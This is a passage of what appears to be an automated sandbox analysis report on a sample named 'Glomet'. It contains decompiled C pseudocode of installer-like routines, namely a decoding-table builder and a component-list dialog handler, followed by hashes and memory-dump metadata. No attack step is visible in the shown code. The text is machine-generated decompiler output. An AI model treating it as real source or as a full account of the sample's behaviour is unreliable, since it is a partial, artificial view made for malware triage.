                                                                                                                                                                              				void* _t299;
                                                                                                                                                                              
                                                                                                                                                                              				_t278 = _a8;
                                                                                                                                                                              				_t187 = 0x10;
                                                                                                                                                                              				memset( &_v116, 0, _t187 << 2);
                                                                                                                                                                              				_t189 = _a4;
                                                                                                                                                                              				_t233 = _t278;
                                                                                                                                                                              				do {
                                                                                                                                                                              					_t166 =  *_t189;
                                                                                                                                                                              					_t189 =  &(_t189[1]);
                                                                                                                                                                              					 *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) =  *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) + 1;
                                                                                                                                                                              					_t233 = _t233 - 1;
                                                                                                                                                                              				} while (_t233 != 0);
                                                                                                                                                                              				if(_v116 != _t278) {
                                                                                                                                                                              					_t279 = _a28;
                                                                                                                                                                              					_t267 =  *_t279;
                                                                                                                                                                              					_t190 = 1;
                                                                                                                                                                              					_a28 = _t267;
                                                                                                                                                                              					_t234 = 0xf;
                                                                                                                                                                              					while(1) {
                                                                                                                                                                              						_t168 = 0;
                                                                                                                                                                              						if( *((intOrPtr*)(_t299 + _t190 * 4 - 0x70)) != 0) {
                                                                                                                                                                              							break;
                                                                                                                                                                              						}
                                                                                                                                                                              						_t190 = _t190 + 1;
                                                                                                                                                                              						if(_t190 <= _t234) {
                                                                                                                                                                              							continue;
                                                                                                                                                                              						}
                                                                                                                                                                              						break;
                                                                                                                                                                              					}
                                                                                                                                                                              					_v8 = _t190;
                                                                                                                                                                              					if(_t267 < _t190) {
                                                                                                                                                                              						_a28 = _t190;
                                                                                                                                                                              					}
                                                                                                                                                                              					while( *((intOrPtr*)(_t299 + _t234 * 4 - 0x70)) == _t168) {
                                                                                                                                                                              						_t234 = _t234 - 1;
                                                                                                                                                                              						if(_t234 != 0) {
                                                                                                                                                                              							continue;
                                                                                                                                                                              						}
                                                                                                                                                                              						break;
                                                                                                                                                                              					}
                                                                                                                                                                              					_v28 = _t234;
                                                                                                                                                                              					if(_a28 > _t234) {
                                                                                                                                                                              						_a28 = _t234;
                                                                                                                                                                              					}
                                                                                                                                                                              					 *_t279 = _a28;
                                                                                                                                                                              					_t181 = 1 << _t190;
                                                                                                                                                                              					while(_t190 < _t234) {
                                                                                                                                                                              						_t182 = _t181 -  *((intOrPtr*)(_t299 + _t190 * 4 - 0x70));
                                                                                                                                                                              						if(_t182 < 0) {
                                                                                                                                                                              							L64:
                                                                                                                                                                              							return _t168 | 0xffffffff;
                                                                                                                                                                              						}
                                                                                                                                                                              						_t190 = _t190 + 1;
                                                                                                                                                                              						_t181 = _t182 + _t182;
                                                                                                                                                                              					}
                                                                                                                                                                              					_t281 = _t234 << 2;
                                                                                                                                                                              					_t191 = _t299 + _t281 - 0x70;
                                                                                                                                                                              					_t269 =  *_t191;
                                                                                                                                                                              					_t183 = _t181 - _t269;
                                                                                                                                                                              					_v52 = _t183;
                                                                                                                                                                              					if(_t183 < 0) {
                                                                                                                                                                              						goto L64;
                                                                                                                                                                              					}
                                                                                                                                                                              					_v176 = _t168;
                                                                                                                                                                              					 *_t191 = _t269 + _t183;
                                                                                                                                                                              					_t192 = 0;
                                                                                                                                                                              					_t235 = _t234 - 1;
                                                                                                                                                                              					if(_t235 == 0) {
                                                                                                                                                                              						L21:
                                                                                                                                                                              						_t184 = _a4;
                                                                                                                                                                              						_t271 = 0;
                                                                                                                                                                              						do {
                                                                                                                                                                              							_t193 =  *_t184;
                                                                                                                                                                              							_t184 =  &(_t184[1]);
                                                                                                                                                                              							if(_t193 != _t168) {
                                                                                                                                                                              								_t232 = _t299 + _t193 * 4 - 0xb0;
                                                                                                                                                                              								_t236 =  *_t232;
                                                                                                                                                                              								 *((intOrPtr*)(0x42d6a8 + _t236 * 4)) = _t271;
                                                                                                                                                                              								 *_t232 = _t236 + 1;
                                                                                                                                                                              							}
                                                                                                                                                                              							_t271 = _t271 + 1;
                                                                                                                                                                              						} while (_t271 < _a8);
                                                                                                                                                                              						_v16 = _v16 | 0xffffffff;
                                                                                                                                                                              						_v40 = _v40 & 0x00000000;
                                                                                                                                                                              						_a8 =  *((intOrPtr*)(_t299 + _t281 - 0xb0));
                                                                                                                                                                              						_t195 = _v8;
                                                                                                                                                                              						_t186 =  ~_a28;
                                                                                                                                                                              						_v12 = _t168;
                                                                                                                                                                              						_v180 = _t168;
                                                                                                                                                                              						_v36 = 0x42d6a8;
                                                                                                                                                                              						_v240 = _t168;
                                                                                                                                                                              						if(_t195 > _v28) {
                                                                                                                                                                              							L62:
                                                                                                                                                                              							_t168 = 0;
                                                                                                                                                                              							if(_v52 == 0 || _v28 == 1) {
                                                                                                                                                                              								return _t168;
                                                                                                                                                                              							} else {
                                                                                                                                                                              								goto L64;
                                                                                                                                                                              							}
                                                                                                                                                                              						}
                                                                                                                                                                              						_v44 = _t195 - 1;
                                                                                                                                                                              						_v32 = _t299 + _t195 * 4 - 0x70;
                                                                                                                                                                              						do {
                                                                                                                                                                              							_t282 =  *_v32;
                                                                                                                                                                              							if(_t282 == 0) {
                                                                                                                                                                              								goto L61;
                                                                                                                                                                              							}
                                                                                                                                                                              							while(1) {
                                                                                                                                                                              								_t283 = _t282 - 1;
                                                                                                                                                                              								_t200 = _a28 + _t186;
                                                                                                                                                                              								_v48 = _t283;
                                                                                                                                                                              								_v24 = _t200;
                                                                                                                                                                              								if(_v8 <= _t200) {
                                                                                                                                                                              									goto L45;
                                                                                                                                                                              								}
                                                                                                                                                                              								L31:
                                                                                                                                                                              								_v20 = _t283 + 1;
                                                                                                                                                                              								do {
                                                                                                                                                                              									_v16 = _v16 + 1;
                                                                                                                                                                              									_t296 = _v28 - _v24;
                                                                                                                                                                              									if(_t296 > _a28) {
                                                                                                                                                                              										_t296 = _a28;
                                                                                                                                                                              									}
                                                                                                                                                                              									_t222 = _v8 - _v24;
                                                                                                                                                                              									_t254 = 1 << _t222;
                                                                                                                                                                              									if(1 <= _v20) {
                                                                                                                                                                              										L40:
                                                                                                                                                                              										_t256 =  *_a36;
                                                                                                                                                                              										_t168 = 1 << _t222;
                                                                                                                                                                              										_v40 = 1;
                                                                                                                                                                              										_t274 = _t256 + 1;
                                                                                                                                                                              										if(_t274 > 0x5a0) {
                                                                                                                                                                              											goto L64;
                                                                                                                                                                              										}
                                                                                                                                                                              									} else {
                                                                                                                                                                              										_t275 = _v32;
                                                                                                                                                                              										_t263 = _t254 + (_t168 | 0xffffffff) - _v48;
                                                                                                                                                                              										if(_t222 >= _t296) {
                                                                                                                                                                              											goto L40;
                                                                                                                                                                              										}
                                                                                                                                                                              										while(1) {
                                                                                                                                                                              											_t222 = _t222 + 1;
                                                                                                                                                                              											if(_t222 >= _t296) {
                                                                                                                                                                              												goto L40;
                                                                                                                                                                              											}
                                                                                                                                                                              											_t275 = _t275 + 4;
                                                                                                                                                                              											_t264 = _t263 + _t263;
                                                                                                                                                                              											_t175 =  *_t275;
                                                                                                                                                                              											if(_t264 <= _t175) {
                                                                                                                                                                              												goto L40;
                                                                                                                                                                              											}
                                                                                                                                                                              											_t263 = _t264 - _t175;
                                                                                                                                                                              										}
                                                                                                                                                                              										goto L40;
                                                                                                                                                                              									}
                                                                                                                                                                              									_t168 = _a32 + _t256 * 4;
                                                                                                                                                                              									_t297 = _t299 + _v16 * 4 - 0xec;
                                                                                                                                                                              									 *_a36 = _t274;
                                                                                                                                                                              									_t259 = _v16;
                                                                                                                                                                              									 *_t297 = _t168;
                                                                                                                                                                              									if(_t259 == 0) {
                                                                                                                                                                              										 *_a24 = _t168;
                                                                                                                                                                              									} else {
                                                                                                                                                                              										_t276 = _v12;
                                                                                                                                                                              										_t298 =  *((intOrPtr*)(_t297 - 4));
                                                                                                                                                                              										 *(_t299 + _t259 * 4 - 0xb0) = _t276;
                                                                                                                                                                              										_a5 = _a28;
                                                                                                                                                                              										_a4 = _t222;
                                                                                                                                                                              										_t262 = _t276 >> _t186;
                                                                                                                                                                              										_a6 = (_t168 - _t298 >> 2) - _t262;
                                                                                                                                                                              										 *(_t298 + _t262 * 4) = _a4;
                                                                                                                                                                              									}
                                                                                                                                                                              									_t224 = _v24;
                                                                                                                                                                              									_t186 = _t224;
                                                                                                                                                                              									_t225 = _t224 + _a28;
                                                                                                                                                                              									_v24 = _t225;
                                                                                                                                                                              								} while (_v8 > _t225);
                                                                                                                                                                              								L45:
                                                                                                                                                                              								_t284 = _v36;
                                                                                                                                                                              								_a5 = _v8 - _t186;
                                                                                                                                                                              								if(_t284 < 0x42d6a8 + _a8 * 4) {
                                                                                                                                                                              									_t205 =  *_t284;
                                                                                                                                                                              									if(_t205 >= _a12) {
                                                                                                                                                                              										_t207 = _t205 - _a12 + _t205 - _a12;
                                                                                                                                                                              										_v36 =  &(_v36[1]);
                                                                                                                                                                              										_a4 =  *((intOrPtr*)(_t207 + _a20)) + 0x50;
                                                                                                                                                                              										_t208 =  *((intOrPtr*)(_t207 + _a16));
                                                                                                                                                                              									} else {
                                                                                                                                                                              										_a4 = (_t205 & 0xffffff00 | _t205 - 0x00000100 > 0x00000000) - 0x00000001 & 0x00000060;
                                                                                                                                                                              										_t208 =  *_t284;
                                                                                                                                                                              										_v36 =  &(_t284[1]);
                                                                                                                                                                              									}
                                                                                                                                                                              									_a6 = _t208;
                                                                                                                                                                              								} else {
                                                                                                                                                                              									_a4 = 0xc0;
                                                                                                                                                                              								}
                                                                                                                                                                              								_t286 = 1 << _v8 - _t186;
                                                                                                                                                                              								_t244 = _v12 >> _t186;
                                                                                                                                                                              								while(_t244 < _v40) {
                                                                                                                                                                              									 *(_t168 + _t244 * 4) = _a4;
                                                                                                                                                                              									_t244 = _t244 + _t286;
                                                                                                                                                                              								}
                                                                                                                                                                              								_t287 = _v12;
                                                                                                                                                                              								_t246 = 1 << _v44;
                                                                                                                                                                              								while((_t287 & _t246) != 0) {
                                                                                                                                                                              									_t287 = _t287 ^ _t246;
                                                                                                                                                                              									_t246 = _t246 >> 1;
                                                                                                                                                                              								}
                                                                                                                                                                              								_t288 = _t287 ^ _t246;
                                                                                                                                                                              								_v20 = 1;
                                                                                                                                                                              								_v12 = _t288;
                                                                                                                                                                              								_t251 = _v16;
                                                                                                                                                                              								if(((1 << _t186) - 0x00000001 & _t288) ==  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0))) {
                                                                                                                                                                              									L60:
                                                                                                                                                                              									if(_v48 != 0) {
                                                                                                                                                                              										_t282 = _v48;
                                                                                                                                                                              										_t283 = _t282 - 1;
                                                                                                                                                                              										_t200 = _a28 + _t186;
                                                                                                                                                                              										_v48 = _t283;
                                                                                                                                                                              										_v24 = _t200;
                                                                                                                                                                              										if(_v8 <= _t200) {
                                                                                                                                                                              											goto L45;
                                                                                                                                                                              										}
                                                                                                                                                                              										goto L31;
                                                                                                                                                                              									}
                                                                                                                                                                              									break;
                                                                                                                                                                              								} else {
                                                                                                                                                                              									goto L58;
                                                                                                                                                                              								}
                                                                                                                                                                              								do {
                                                                                                                                                                              									L58:
                                                                                                                                                                              									_t186 = _t186 - _a28;
                                                                                                                                                                              									_t251 = _t251 - 1;
                                                                                                                                                                              								} while (((1 << _t186) - 0x00000001 & _v12) !=  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0)));
                                                                                                                                                                              								_v16 = _t251;
                                                                                                                                                                              								goto L60;
                                                                                                                                                                              							}
                                                                                                                                                                              							L61:
                                                                                                                                                                              							_v8 = _v8 + 1;
                                                                                                                                                                              							_v32 = _v32 + 4;
                                                                                                                                                                              							_v44 = _v44 + 1;
                                                                                                                                                                              						} while (_v8 <= _v28);
                                                                                                                                                                              						goto L62;
                                                                                                                                                                              					}
                                                                                                                                                                              					_t277 = 0;
                                                                                                                                                                              					do {
                                                                                                                                                                              						_t192 = _t192 +  *((intOrPtr*)(_t299 + _t277 - 0x6c));
                                                                                                                                                                              						_t277 = _t277 + 4;
                                                                                                                                                                              						_t235 = _t235 - 1;
                                                                                                                                                                              						 *((intOrPtr*)(_t299 + _t277 - 0xac)) = _t192;
                                                                                                                                                                              					} while (_t235 != 0);
                                                                                                                                                                              					goto L21;
                                                                                                                                                                              				}
                                                                                                                                                                              				 *_a24 =  *_a24 & 0x00000000;
                                                                                                                                                                              				 *_a28 =  *_a28 & 0x00000000;
                                                                                                                                                                              				return 0;
                                                                                                                                                                              			}
                                                                                                                                                                              0x0040742c
                                                                                                                                                                              0x00407432
                                                                                                                                                                              0x00407434
                                                                                                                                                                              0x00407436
                                                                                                                                                                              0x00407439
                                                                                                                                                                              0x00407442
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00407409
                                                                                                                                                                              0x00407409
                                                                                                                                                                              0x00407412
                                                                                                                                                                              0x00407416
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00407427
                                                                                                                                                                              0x00407427
                                                                                                                                                                              0x0040742a
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x0040741a
                                                                                                                                                                              0x0040741d
                                                                                                                                                                              0x0040741f
                                                                                                                                                                              0x00407423
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00407425
                                                                                                                                                                              0x00407425
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00407427
                                                                                                                                                                              0x0040744b
                                                                                                                                                                              0x00407451
                                                                                                                                                                              0x0040745b
                                                                                                                                                                              0x0040745d
                                                                                                                                                                              0x00407462
                                                                                                                                                                              0x00407464
                                                                                                                                                                              0x0040749a
                                                                                                                                                                              0x00407466
                                                                                                                                                                              0x00407466
                                                                                                                                                                              0x00407469
                                                                                                                                                                              0x0040746c
                                                                                                                                                                              0x00407476
                                                                                                                                                                              0x00407479
                                                                                                                                                                              0x00407480
                                                                                                                                                                              0x0040748b
                                                                                                                                                                              0x00407492
                                                                                                                                                                              0x00407492
                                                                                                                                                                              0x0040749c
                                                                                                                                                                              0x0040749f
                                                                                                                                                                              0x004074a1
                                                                                                                                                                              0x004074a7
                                                                                                                                                                              0x004074a7
                                                                                                                                                                              0x004074b0
                                                                                                                                                                              0x004074b3
                                                                                                                                                                              0x004074b8
                                                                                                                                                                              0x004074c7
                                                                                                                                                                              0x004074cf
                                                                                                                                                                              0x004074d4
                                                                                                                                                                              0x004074f8
                                                                                                                                                                              0x00407500
                                                                                                                                                                              0x00407504
                                                                                                                                                                              0x0040750a
                                                                                                                                                                              0x004074d6
                                                                                                                                                                              0x004074e4
                                                                                                                                                                              0x004074e7
                                                                                                                                                                              0x004074ed
                                                                                                                                                                              0x004074ed
                                                                                                                                                                              0x0040750e
                                                                                                                                                                              0x004074c9
                                                                                                                                                                              0x004074c9
                                                                                                                                                                              0x004074c9
                                                                                                                                                                              0x0040751f
                                                                                                                                                                              0x00407523
                                                                                                                                                                              0x0040752f
                                                                                                                                                                              0x0040752a
                                                                                                                                                                              0x0040752d
                                                                                                                                                                              0x0040752d
                                                                                                                                                                              0x00407537
                                                                                                                                                                              0x0040753c
                                                                                                                                                                              0x00407544
                                                                                                                                                                              0x00407540
                                                                                                                                                                              0x00407542
                                                                                                                                                                              0x00407542
                                                                                                                                                                              0x0040754a
                                                                                                                                                                              0x0040754c
                                                                                                                                                                              0x00407553
                                                                                                                                                                              0x0040755d
                                                                                                                                                                              0x00407567
                                                                                                                                                                              0x00407583
                                                                                                                                                                              0x00407587
                                                                                                                                                                              0x004073cc
                                                                                                                                                                              0x004073d2
                                                                                                                                                                              0x004073d3
                                                                                                                                                                              0x004073d5
                                                                                                                                                                              0x004073db
                                                                                                                                                                              0x004073de
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x004073de
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00407569
                                                                                                                                                                              0x00407569
                                                                                                                                                                              0x00407569
                                                                                                                                                                              0x0040756e
                                                                                                                                                                              0x00407577
                                                                                                                                                                              0x00407580
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00407580
                                                                                                                                                                              0x0040758d
                                                                                                                                                                              0x0040758d
                                                                                                                                                                              0x00407590
                                                                                                                                                                              0x00407597
                                                                                                                                                                              0x0040759a
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x004073bd
                                                                                                                                                                              0x0040733d
                                                                                                                                                                              0x0040733f
                                                                                                                                                                              0x0040733f
                                                                                                                                                                              0x00407343
                                                                                                                                                                              0x00407346
                                                                                                                                                                              0x00407347
                                                                                                                                                                              0x00407347
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x0040733f
                                                                                                                                                                              0x004072b3
                                                                                                                                                                              0x004072b9
                                                                                                                                                                              0x00000000

                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000001D.00000002.575890944.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 0000001D.00000002.575844664.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.576063119.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.576133488.000000000040A000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577041699.000000000042C000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577174379.0000000000431000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577257988.0000000000435000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577403934.0000000000446000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577502312.0000000000448000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_29_2_400000_Glomet.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 99f6c7e6b8620be82bccd3d2e3e98bb61de1be8b453b643f323292903d4af905
                                                                                                                                                                              • Instruction ID: 973a31ab38dbc5c4480f1d9ea431a22b3101bf508bc4e87126308f85d1407ce0
                                                                                                                                                                              • Opcode Fuzzy Hash: 99f6c7e6b8620be82bccd3d2e3e98bb61de1be8b453b643f323292903d4af905
                                                                                                                                                                              • Instruction Fuzzy Hash: 03C13631E042199BCF18CF68D8905EEBBB2FF89314F25866AD85677380D734A942CB95
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              C-Code - Quality: 96%
                                                                                                                                                                              			E00404CD9(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
                                                                                                                                                                              				struct HWND__* _v8;
                                                                                                                                                                              				struct HWND__* _v12;
                                                                                                                                                                              				long _v16;
                                                                                                                                                                              				signed int _v20;
                                                                                                                                                                              				signed int _v24;
                                                                                                                                                                              				intOrPtr _v28;
                                                                                                                                                                              				signed char* _v32;
                                                                                                                                                                              				int _v36;
                                                                                                                                                                              				signed int _v44;
                                                                                                                                                                              				int _v48;
                                                                                                                                                                              				signed int* _v60;
                                                                                                                                                                              				signed char* _v64;
                                                                                                                                                                              				signed int _v68;
                                                                                                                                                                              				long _v72;
                                                                                                                                                                              				void* _v76;
                                                                                                                                                                              				intOrPtr _v80;
                                                                                                                                                                              				intOrPtr _v84;
                                                                                                                                                                              				void* _v88;
                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                              				void* __edi;
                                                                                                                                                                              				void* __esi;
                                                                                                                                                                              				signed int _t203;
                                                                                                                                                                              				void* _t205;
                                                                                                                                                                              				intOrPtr _t206;
                                                                                                                                                                              				intOrPtr _t207;
                                                                                                                                                                              				long _t212;
                                                                                                                                                                              				signed int _t216;
                                                                                                                                                                              				signed int _t227;
                                                                                                                                                                              				void* _t230;
                                                                                                                                                                              				void* _t231;
                                                                                                                                                                              				int _t237;
                                                                                                                                                                              				long _t242;
                                                                                                                                                                              				long _t243;
                                                                                                                                                                              				signed int _t244;
                                                                                                                                                                              				signed int _t250;
                                                                                                                                                                              				signed int _t252;
                                                                                                                                                                              				signed char _t253;
                                                                                                                                                                              				signed char _t259;
                                                                                                                                                                              				void* _t264;
                                                                                                                                                                              				void* _t266;
                                                                                                                                                                              				signed char* _t284;
                                                                                                                                                                              				signed char _t285;
                                                                                                                                                                              				long _t287;
                                                                                                                                                                              				long _t290;
                                                                                                                                                                              				void* _t291;
                                                                                                                                                                              				signed int _t300;
                                                                                                                                                                              				signed int _t308;
                                                                                                                                                                              				void* _t309;
                                                                                                                                                                              				void* _t310;
                                                                                                                                                                              				signed char* _t316;
                                                                                                                                                                              				int _t320;
                                                                                                                                                                              				int _t321;
                                                                                                                                                                              				signed int* _t322;
                                                                                                                                                                              				int _t323;
                                                                                                                                                                              				long _t324;
                                                                                                                                                                              				signed int _t325;
                                                                                                                                                                              				long _t327;
                                                                                                                                                                              				int _t328;
                                                                                                                                                                              				signed int _t329;
                                                                                                                                                                              				void* _t331;
                                                                                                                                                                              
                                                                                                                                                                              				_v12 = GetDlgItem(_a4, 0x3f9);
                                                                                                                                                                              				_v8 = GetDlgItem(_a4, 0x408);
                                                                                                                                                                              				_t331 = SendMessageA;
                                                                                                                                                                              				_v24 =  *0x42f448;
                                                                                                                                                                              				_v28 =  *0x42f430 + 0x94;
                                                                                                                                                                              				_t320 = 0x10;
                                                                                                                                                                              				if(_a8 != 0x110) {
                                                                                                                                                                              					L23:
                                                                                                                                                                              					if(_a8 != 0x405) {
                                                                                                                                                                              						_t298 = _a16;
                                                                                                                                                                              					} else {
                                                                                                                                                                              						_a12 = 0;
                                                                                                                                                                              						_t298 = 1;
                                                                                                                                                                              						_a8 = 0x40f;
                                                                                                                                                                              						_a16 = 1;
                                                                                                                                                                              					}
                                                                                                                                                                              					if(_a8 == 0x4e || _a8 == 0x413) {
                                                                                                                                                                              						_v16 = _t298;
                                                                                                                                                                              						if(_a8 == 0x413 ||  *((intOrPtr*)(_t298 + 4)) == 0x408) {
                                                                                                                                                                              							if(( *0x42f439 & 0x00000002) != 0) {
                                                                                                                                                                              								L41:
                                                                                                                                                                              								if(_v16 != 0) {
                                                                                                                                                                              									_t242 = _v16;
                                                                                                                                                                              									if( *((intOrPtr*)(_t242 + 8)) == 0xfffffe6e) {
                                                                                                                                                                              										SendMessageA(_v8, 0x419, 0,  *(_t242 + 0x5c));
                                                                                                                                                                              									}
                                                                                                                                                                              									_t243 = _v16;
                                                                                                                                                                              									if( *((intOrPtr*)(_t243 + 8)) == 0xfffffe6a) {
                                                                                                                                                                              										_t298 = _v24;
                                                                                                                                                                              										_t244 =  *(_t243 + 0x5c);
                                                                                                                                                                              										if( *((intOrPtr*)(_t243 + 0xc)) != 2) {
                                                                                                                                                                              											 *(_t244 * 0x418 + _t298 + 8) =  *(_t244 * 0x418 + _t298 + 8) & 0xffffffdf;
                                                                                                                                                                              										} else {
                                                                                                                                                                              											 *(_t244 * 0x418 + _t298 + 8) =  *(_t244 * 0x418 + _t298 + 8) | 0x00000020;
                                                                                                                                                                              										}
                                                                                                                                                                              									}
                                                                                                                                                                              								}
                                                                                                                                                                              								goto L48;
                                                                                                                                                                              							}
                                                                                                                                                                              							if(_a8 == 0x413) {
                                                                                                                                                                              								L33:
                                                                                                                                                                              								_t298 = 0 | _a8 != 0x00000413;
                                                                                                                                                                              								_t250 = E00404C27(_v8, _a8 != 0x413);
                                                                                                                                                                              								_t325 = _t250;
                                                                                                                                                                              								if(_t325 >= 0) {
                                                                                                                                                                              									_t99 = _v24 + 8; // 0x8
                                                                                                                                                                              									_t298 = _t250 * 0x418 + _t99;
                                                                                                                                                                              									_t252 =  *_t298;
                                                                                                                                                                              									if((_t252 & 0x00000010) == 0) {
                                                                                                                                                                              										if((_t252 & 0x00000040) == 0) {
                                                                                                                                                                              											_t253 = _t252 ^ 0x00000001;
                                                                                                                                                                              										} else {
                                                                                                                                                                              											_t259 = _t252 ^ 0x00000080;
                                                                                                                                                                              											if(_t259 >= 0) {
                                                                                                                                                                              												_t253 = _t259 & 0x000000fe;
                                                                                                                                                                              											} else {
                                                                                                                                                                              												_t253 = _t259 | 0x00000001;
                                                                                                                                                                              											}
                                                                                                                                                                              										}
                                                                                                                                                                              										 *_t298 = _t253;
                                                                                                                                                                              										E0040117D(_t325);
                                                                                                                                                                              										_a12 = _t325 + 1;
                                                                                                                                                                              										_a16 =  !( *0x42f438) >> 0x00000008 & 0x00000001;
                                                                                                                                                                              										_a8 = 0x40f;
                                                                                                                                                                              									}
                                                                                                                                                                              								}
                                                                                                                                                                              								goto L41;
                                                                                                                                                                              							}
                                                                                                                                                                              							_t298 = _a16;
                                                                                                                                                                              							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
                                                                                                                                                                              								goto L41;
                                                                                                                                                                              							}
                                                                                                                                                                              							goto L33;
                                                                                                                                                                              						} else {
                                                                                                                                                                              							goto L48;
                                                                                                                                                                              						}
                                                                                                                                                                              					} else {
                                                                                                                                                                              						L48:
                                                                                                                                                                              						if(_a8 != 0x111) {
                                                                                                                                                                              							L56:
                                                                                                                                                                              							if(_a8 == 0x200) {
                                                                                                                                                                              								SendMessageA(_v8, 0x200, 0, 0);
                                                                                                                                                                              							}
                                                                                                                                                                              							if(_a8 == 0x40b) {
                                                                                                                                                                              								_t230 =  *0x42a874; // 0x0
                                                                                                                                                                              								if(_t230 != 0) {
                                                                                                                                                                              									ImageList_Destroy(_t230);
                                                                                                                                                                              								}
                                                                                                                                                                              								_t231 =  *0x42a888; // 0x0
                                                                                                                                                                              								if(_t231 != 0) {
                                                                                                                                                                              									GlobalFree(_t231);
                                                                                                                                                                              								}
								 *0x42a874 = 0;
								 *0x42a888 = 0;
								 *0x42f480 = 0;
							}
							if(_a8 != 0x40f) {
								L90:
								if(_a8 == 0x420 && ( *0x42f439 & 0x00000001) != 0) {
									_t321 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t321);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t321);
								}
								goto L93;
							} else {
								E004011EF(_t298, 0, 0);
								_t203 = _a12;
								if(_t203 != 0) {
									if(_t203 != 0xffffffff) {
										_t203 = _t203 - 1;
									}
									_push(_t203);
									_push(8);
									E00404CA7();
								}
								if(_a16 == 0) {
									L75:
									E004011EF(_t298, 0, 0);
									_t205 =  *0x42a888; // 0x0
									_v36 = _t205;
									_t206 =  *0x42f448;
									_v64 = 0xf030;
									_v24 = 0;
									if( *0x42f44c <= 0) {
										L86:
										if( *0x42f4de == 0x400) {
											InvalidateRect(_v8, 0, 1);
										}
										_t207 =  *0x42ebfc; // 0x5a1993
										if( *((intOrPtr*)(_t207 + 0x10)) != 0) {
											E00404BE2(0x3ff, 0xfffffffb, E00404BFA(5));
										}
										goto L90;
									}
									_t322 = _t206 + 8;
									do {
										_t212 =  *((intOrPtr*)(_v36 + _v24 * 4));
										if(_t212 != 0) {
											_t300 =  *_t322;
											_v72 = _t212;
											_v76 = 8;
											if((_t300 & 0x00000001) != 0) {
												_v76 = 9;
												_v60 =  &(_t322[4]);
												_t322[0] = _t322[0] & 0x000000fe;
											}
											if((_t300 & 0x00000040) == 0) {
												_t216 = (_t300 & 0x00000001) + 1;
												if((_t300 & 0x00000010) != 0) {
													_t216 = _t216 + 3;
												}
											} else {
												_t216 = 3;
											}
											_v68 = (_t216 << 0x0000000b | _t300 & 0x00000008) + (_t216 << 0x0000000b | _t300 & 0x00000008) | _t300 & 0x00000020;
											SendMessageA(_v8, 0x1102, (_t300 >> 0x00000005 & 0x00000001) + 1, _v72);
											SendMessageA(_v8, 0x110d, 0,  &_v76);
										}
										_v24 = _v24 + 1;
										_t322 =  &(_t322[0x106]);
									} while (_v24 <  *0x42f44c);
									goto L86;
								} else {
									_t323 = E004012E2( *0x42a888);
									E00401299(_t323);
									_t227 = 0;
									_t298 = 0;
									if(_t323 <= 0) {
										L74:
										SendMessageA(_v12, 0x14e, _t298, 0);
										_a16 = _t323;
										_a8 = 0x420;
										goto L75;
									} else {
										goto L71;
									}
									do {
										L71:
										if( *((intOrPtr*)(_v28 + _t227 * 4)) != 0) {
											_t298 = _t298 + 1;
										}
										_t227 = _t227 + 1;
									} while (_t227 < _t323);
									goto L74;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L93;
						} else {
							_t237 = SendMessageA(_v12, 0x147, 0, 0);
							if(_t237 == 0xffffffff) {
								goto L93;
							}
							_t324 = SendMessageA(_v12, 0x150, _t237, 0);
							if(_t324 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t324 * 4)) == 0) {
								_t324 = 0x20;
							}
							E00401299(_t324);
							SendMessageA(_a4, 0x420, 0, _t324);
							_a12 = _a12 | 0xffffffff;
							_a16 = 0;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					_v36 = 0;
					 *0x42f480 = _a4;
					_v20 = 2;
					 *0x42a888 = GlobalAlloc(0x40,  *0x42f44c << 2);
					_t264 = LoadImageA( *0x42f420, 0x6e, 0, 0, 0, 0);
					 *0x42a87c =  *0x42a87c | 0xffffffff;
					_v16 = _t264;
					 *0x42a884 = SetWindowLongA(_v8, 0xfffffffc, E004052EC);
					_t266 = ImageList_Create(_t320, _t320, 0x21, 6, 0);
					 *0x42a874 = _t266;
					ImageList_AddMasked(_t266, _v16, 0xff00ff);
